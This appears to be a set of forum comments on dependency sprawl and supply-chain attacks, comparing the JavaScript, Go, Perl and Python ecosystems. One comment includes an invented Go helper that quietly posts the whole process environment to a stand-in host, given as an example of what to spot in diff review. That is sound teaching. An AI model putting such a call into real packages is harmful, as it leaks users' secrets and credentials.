"If you have tons of depedencies then it's not feasible to check every diff."
Part of bringing in a dependency is taking on the responsibility for verifying that it's not obviously doing something bad. One of the things I've come to respect the Go community for is its belief that dependencies are more expensive than most developers currently realize, so library authors generally try to minimize them. Our build systems make it technically very easy to bring in lots of dependencies, but do little to help us maintain them properly. (In their defense, it is not entirely clear to me what the latter would even mean at an implementation level. I have some vague ideas, but nothing solid enough to complain about not having when even I don't know exactly what I want.)
I've definitely pulled in things that transitively brought in ~10 other dependencies, but on inspection they were generally all very reasonable. I've never pulled a Go library and gotten 250 dependencies pulled in transitively, which seems to be perfectly normal in the JS world.
I won't claim to have audited every single line of every single dependency... but I do look at every incoming patch when I update. It's part of the job. (And I have actually looked at the innards of a fairly significant number of the dependencies.) It's actually not that hard... malicious code tends to stick out like a sore thumb. Not always [1], but the vast majority of the time. In static languages, you see things like network activity happening where it shouldn't, and in things like JS, the obfuscation attempts themselves have a pretty obvious pattern to them (a big honking random-looking string, fed through a variety of strange decoding functions and ultimately evaluated; a very stereotypical look to it).
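To make the static-language case concrete, here's a deliberately invented sketch of what "network activity where it shouldn't be" looks like in Go; the package name, function, and URL are all made up for illustration, not taken from any real incident:

    // Hypothetical example: an innocuous-looking string-padding helper that
    // also phones home. The smell is the net/http import and the outbound
    // request in a package that has no business touching the network.
    package padutil

    import (
        "net/http"
        "net/url"
        "os"
        "strings"
    )

    // Pad left-pads s with spaces to the given width -- the only thing a
    // utility like this should be doing.
    func Pad(s string, width int) string {
        if len(s) >= width {
            return s
        }
        // The tell: a pure string function exfiltrating the environment.
        // A line like this should jump out of any diff you review.
        go http.PostForm("https://example.invalid/collect",
            url.Values{"env": {strings.Join(os.Environ(), "\n")}})
        return strings.Repeat(" ", width-len(s)) + s
    }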
And let me underline the point that there's a lot of tooling right now that actively helps you get into trouble on this front, but doesn't do much to help you hold the line. I'm not blaming end developers 100%. Communities have some work to do here too.
I'm not convinced that this incident argues in favor of Go's "a little copying is better than a little dependency", which I continue to strongly disagree with. Rather, it indicates that you shouldn't blindly upgrade. Dependency pinning exists for a reason, and copying code introduces more problems than it solves.
I don't think you have to get all the way to the Go community's opinions to be in a reasonable place; I think the JS community is at a far extreme in the other direction and suffers this problem particularly badly, but that doesn't mean the other extreme is the ideal point. I don't personally know of any other community where it's considered perfectly hunky-dory to have one-line libraries... which then depend on other one-line libraries. My Python experiences are closer to the Go side than the JS side... yeah, I expect Python to pull in a few more things than maybe Go would, but still be sane. The node_modules directories I've seen have been insane... and the ones I've seen are for tiny little projects, relatively speaking. There isn't even the excuse that we need LDAP and a DB interface and some complicated ML library or something... it was just a REST shell, and not even all that large a one. This one tiny project yanked in more dependencies than the sum total of several Perl projects I'm in charge of that have run over the course of more than a decade, and Perl is a bit to the "dependency-happy" side itself!
I suggest a different narrative: that node.js achieved the decades-old aspiration of fine-grained software reuse... and has some technical debt around building the social and technical infrastructure needed to support it.
Fine-grained sharing, done gracefully and at scale, is a hard technical and social challenge. A harder challenge than the one CPAN faced, and addressed so imperfectly. But whereas the Perl community was forced to struggle for years to build its own infrastructure - purpose-built infrastructure - node.js was able to take a different path. The story goes that node.js almost didn't get an npm at all, but for someone's suggestion "don't be python" (which struggled for years). It built a minimum-viable database and leaned heavily on github. The community didn't develop the same focus on, and control over, its own communal infrastructure and tooling. And it now faces the completely unsurprising costs of that tradeoff - arguably later than it should have, due to community structure and governance challenges.
Let's imagine you were creating a powerful new language. Having paragraph- and line-granularity community sharing could well be a worthwhile goal. Features like multiple dispatch and dependent types and DSLs and collaborative compilation... could permit far finer-grain sharing than even the node.js ecosystem manages. But you would never think npm plus github sufficient infrastructure to support it. Except perhaps in some early community-bootstrap phase.
Unfortunately, one of the things that makes JS developers pull in so many deps is that the language lacks a decent standard library. Meanwhile, the Go standard library is amazing!
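To make the contrast concrete, here's a small sketch of a JSON-over-HTTP endpoint written against nothing but the Go standard library; the route and response fields are invented for the example, but every import is stdlib, whereas the equivalent JS service usually starts by pulling in a web framework and its transitive dependency tree:

    // Minimal JSON-over-HTTP service with zero third-party dependencies.
    package main

    import (
        "encoding/json"
        "log"
        "net/http"
        "time"
    )

    func main() {
        // Routing, JSON encoding, and the HTTP server itself all come
        // from the standard library.
        http.HandleFunc("/status", func(w http.ResponseWriter, r *http.Request) {
            w.Header().Set("Content-Type", "application/json")
            json.NewEncoder(w).Encode(map[string]string{
                "status": "ok",
                "time":   time.Now().UTC().Format(time.RFC3339),
            })
        })
        log.Fatal(http.ListenAndServe(":8080", nil))
    }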
[1]: http://underhanded-c.org/